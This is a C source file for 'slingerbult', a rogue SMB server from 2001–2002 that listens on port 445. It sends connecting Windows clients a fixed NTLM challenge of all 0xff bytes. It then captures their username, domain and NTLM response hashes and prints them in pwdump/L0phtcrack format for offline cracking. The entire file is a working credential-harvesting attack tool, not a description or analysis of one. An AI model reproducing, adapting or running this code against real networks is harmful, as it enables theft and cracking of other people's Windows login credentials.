//
//  slingerbult.c - SMB NTLM challenge/response solicitor
//
//  solicits an NTLM response for the challenge "0xff0xff0xff0xff0xff0xff0xff0xff"
//
//  borrows some basic stuff from <jason.rhoads@sabernet.net> since I'm lazy.
//
//
// HISTORY:
//
//		0.01: first release
//
//
/*

Copyright (c) 2001, Olle Segerdahl <olle@nxs.se>
All rights reserved.

Redistribution and use in source and binary forms, with or without
 modification, are permitted provided that the following conditions are met:

- Redistributions of source code must retain the above copyright notice,
  this list of conditions and the following disclaimer.

- Redistributions in binary form must reproduce the above copyright notice,
  this list of conditions and the following disclaimer in the documentation
  and/or other materials provided with the distribution.

- Neither the name of the author nor the names of any contributors may be used
  to endorse or promote products derived from this software without specific
  prior written permission.

THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.

*/


#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <unistd.h>
#include <ctype.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define VERSION				"0.01"

#define SMB_NT_PROTOCOL			17+8		/* NTLM Protocol      */
#define SMB_LM_PROTOCOL			13+8		/* LanMan Protocol    */
#define SMB_SSP_PROTOCOL		17+0		/* NTLMSSP Protocol   */

#define SMBnegprot    			0x72	/* negotiate protocol */
#define SMBsesssetupX    		0x73    /* Session Set Up & X */

#define SMB_ERR_MORE_PROC_REQ		0xc0000016
#define SMB_ERR_LOGON_FAILED		0xc000006d

/* code from Samba (byteorder.h) */
#define CVAL(buf,pos) (((unsigned char *)(buf))[pos])
#define PVAL(buf,pos) ((unsigned)CVAL(buf,pos))
#define SVAL(buf,pos) (PVAL(buf,pos)|PVAL(buf,(pos)+1)<<8)
#define IVAL(buf,pos) (SVAL(buf,pos)|SVAL(buf,(pos)+2)<<16)
#define SREV(x) ((((x)&0xFF)<<8) | (((x)>>8)&0xFF))
#define IREV(x) ((SREV(x)<<16) | (SREV((x)>>16)))
#define RIVAL(buf,pos) IREV(IVAL(buf,pos))

unsigned int uni_strlen(u_char *uni)
{
	u_char	tmpchar='A';
	int	i;

	for (i=0;i<255;i++)
	{
		if ((tmpchar == 0) && (uni[i] == 0))
			break;
		tmpchar = uni[i];
	}
	return i;
}


static void die(char *format, ...)
{
  	va_list       args;

  	va_start(args, format);
  	fprintf(stderr, "ERROR: ");
  	vfprintf(stderr, format, args);
  	fprintf(stderr, "\n");
  	va_end(args);
	fflush(stderr);
	exit(-1);
}


char *extract_user(u_char *packet, int offset, int len)
{
	static char	extract[49];
	int i,ii;

	if (packet == NULL)
		return(NULL);

	if (len) 
	{
		ii=0;
		for (i=0;i<len;i++)
		{
			extract[i] = packet[offset+ii];
			ii += 2;
		}
		extract[len] = 0;

	} else {

		strncpy(extract, (packet + offset), 49);
		extract[48] = 0;

	}

	return(extract);
}


char *extract_pass(u_char *packet, int offset, int len)
{
	static char	extract[49];

	if (packet == NULL)
		return(NULL);

	snprintf(extract, 49, "%.8x%.8x%.8x%.8x%.8x%.8x", 
			 RIVAL(packet, offset     ), 
			 RIVAL(packet, offset +  4), 
			 RIVAL(packet, offset +  8), 
			 RIVAL(packet, offset + 12), 
			 RIVAL(packet, offset + 16), 
			 RIVAL(packet, offset + 20) );
	extract[48] = 0;

	return(extract);
}


void slingerbult(int s, int verbose)
{
	u_char 		packet_space[1500];
	u_char		*packet;
	char		*user;
	char		*domain;
	unsigned int	 userlen;
	int		 e;

	// get packet
	packet = packet_space;
	e = recv(s, packet, 1500, 0);
	if (e<0)
		die("recv returned %i", e);

	// check for nbss sessreq
	if (CVAL(packet,0)==0x81)
	{
		packet[0]=0x82;
		packet[1]=0x00;
		packet[2]=0x00;
		packet[3]=0x00;
		packet[4]=0xfe;
		packet[5]=0xff;
		
		e = send(s, packet, 6, 0);
		if (e<0)
			die("send returned %i", e);

		// get next packet
		e = recv(s, packet, 1500, 0);
		if (e<0)
			die("recv returned %i", e);
	}

	// skip optional NetBios header
	if (memcmp(packet+4,"\xFFSMB",4)==0)
		packet += 4;

	// check for SMB packet
	if (memcmp(packet,"\xFFSMB",4)==0)
	{

        	fprintf(stderr,"cmd=%X ", CVAL(packet,4));
		fprintf(stderr,"reply=%i\n",CVAL(packet,9)>>7);

		// skip SMB header
		packet += 32;

	} else {
		die("Non SMB packet recv:ed\n");
	}

	packet = packet_space;

	// build reply

	// null packet
	memset(packet, 0, 1500);

	// nbss header
	packet[3] = 92;

	packet[4]	= 0xff;
	packet[5] 	= 'S';
	packet[6] 	= 'M';
	packet[7] 	= 'B';
	packet[8]	= 0x72;
	packet[13]	= 0x98;
	packet[14]	= 0x53;
	packet[15]	= 0xc8;

	packet[30]	= 0xad; // pid
	packet[31]	= 0xde; // pid

	packet[36]	= 17; // wct
	packet[37]	= 5; // dialect index
	packet[39]	= 3; // security mode
	packet[40]	= 50;
	packet[42]	= 1;
	packet[44]	= 0x04;
	packet[45]	= 0x11;
	packet[50]	= 1;
	packet[56]	= 0xfd;
	packet[57]	= 0x43;
	packet[70]	= 8;   // challenge length
	packet[71]	= 22;  // byte count
	
	packet[73]	= 0xff;// challenge
	packet[74]	= 0xff;
	packet[75]	= 0xff;
	packet[76]	= 0xff;
	packet[77]	= 0xff;
	packet[78]	= 0xff;
	packet[79]	= 0xff;
	packet[80]	= 0xff;

	packet[81]	= 'S';  // domain
	packet[82]	= 'L';
	packet[83]	= 'I';
	packet[84]	= 'N';
	packet[85]	= 'G';
	packet[86]	= 'E';
	packet[86]	= 'R';


	// send reply
	e = send(s, packet, 92+4, 0);
	if (e<0)
		die("send returned %i", e);


	// get packet
	packet = packet_space;
	e = recv(s, packet, 1500, 0);
	if (e<0)
		die("recv returned %i", e);

	// skip optional NetBios header
	if (memcmp(packet+4,"\xFFSMB",4)==0)
		packet += 4;

	// check for SMB packet
	if (memcmp(packet,"\xFFSMB",4)==0)
	{

        	fprintf(stderr,"cmd=%X ", CVAL(packet,4));
		fprintf(stderr,"reply=%i\n",CVAL(packet,9)>>7);

		// skip SMB header
		packet += 32;

	} else {
		die("Non-SMB packet recv:ed!");
	}

	// sessetup request
	if ( (CVAL(packet,-32+4) == SMBsesssetupX) && !(CVAL(packet,-32+9)>>7) ) {
		fprintf(stderr,"passlen=%i ",CVAL(packet,15));
		fprintf(stderr,"passlen=%i\n",CVAL(packet,17));

		// check if password length == 0
		if (CVAL(packet,17) == 0)
		{
			//goto get_response;
			fprintf(stderr, "Null session request recv:ed, terminating session\n");
			exit(1);
		}

		// print connection info
		if (verbose) {
			fprintf(stdout,"; NTLM ");
		}

		// check username for unicode
		if (CVAL(packet,29+24+24+2) == 0)
		{
			if (verbose)
				fprintf(stdout,"UNICODE\n");
			// compute length
			userlen = uni_strlen(packet+29+24+24+1);
			//fprintf(stderr,"userlen=%i\n",userlen);

			// extract domainname
			domain = extract_user(packet, 29+24+24+1+userlen+2, uni_strlen(packet+29+24+24+1+userlen+2));
			fprintf(stdout,"%s\\", domain);

			// extract username
			user = extract_user(packet, 29+24+24+1, userlen);

		} else { // ascii

			if (verbose)
				fprintf(stdout,"ASCII\n");

			// extract domainname
			domain = extract_user(packet, 29+24+24+strlen(packet+29+24+24)+1, 0);
			fprintf(stdout,"%s\\", domain);

			// extract username
			user = extract_user(packet, 29+24+24, 0);
		}

		// print results in pwdump/lc format	
		fprintf(stdout, "%s:3:%s:", user, "FFFFFFFFFFFFFFFF");

		// extract & print NTLM response hashes
		fprintf(stdout, "%s:",  extract_pass(packet, 29, 0));
		fprintf(stdout, "%s\n", extract_pass(packet, 29+24, 0));
		fflush(stdout);

	} else die("Non-sesssetup packet recv:ed");

	// close connection and return
	close(s);
}


void usage(void)
{
	fprintf(stderr,"Usage: slingerbult [-h] [-v] [-p port]\n\n");
	exit(1);
}


int tcp_socket_listen(u_int16_t port)
{
        int                      s, e;
        struct sockaddr_in       sin;

        sin.sin_family = AF_INET;
        sin.sin_addr.s_addr = INADDR_ANY;
        sin.sin_port = htons(port);

        s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if (s == -1)
                die("tcp_accept: unable to create socket\n");

        e = bind(s, (struct sockaddr *) &sin, sizeof(sin));
        if (e == -1)
                die("tcp_accept: unable to bind() socket\n");

        e = listen(s, 10);
        if (e == -1)
                die("tcp_accept: unable to listen() on socket\n");

        fprintf(stderr,"waiting for connections on port %i\n\n", port);

        return(s);
}
	

int main(int argc, char **argv)
{
	int	 arg, s, ss, e, pid;
	int	 verbose	= 0;
	int	 port		= 445;

        struct sockaddr_in       sin;

	fprintf(stderr,"slingerbult %s - SMB challenge/response solicitor   (c)2002 <olle@nxs.se>\n\n", VERSION); 
	
	/* Parse command line options */
	while ((arg = getopt(argc, argv, "vp:")) != EOF)
        {
	        switch(arg)
                {
	                case 'v':
	                	verbose = 1;
	                	break;
	                case 'p':
				port = atoi(optarg);
				break;
	                case 'h':
	                default:
	                	usage();
                }
        }

	if (port < 1 || port > 65535) {
		die("%i is not a valid port!\n",port);
	}

	s = tcp_socket_listen((short)port);

	while (1)
	{
        	ss = accept(s, (struct sockaddr *) &sin, &e);
        	if (e == -1)
                	die("tcp_accept: unable to accept() connection\n");

		pid = fork();
	
		switch(pid)
		{
			case 0:	// forked kid

			close(s);

			slingerbult(ss, verbose);

			exit(0);

			default: // parent proc

			close(ss);
		}
	}	

	exit(0);
}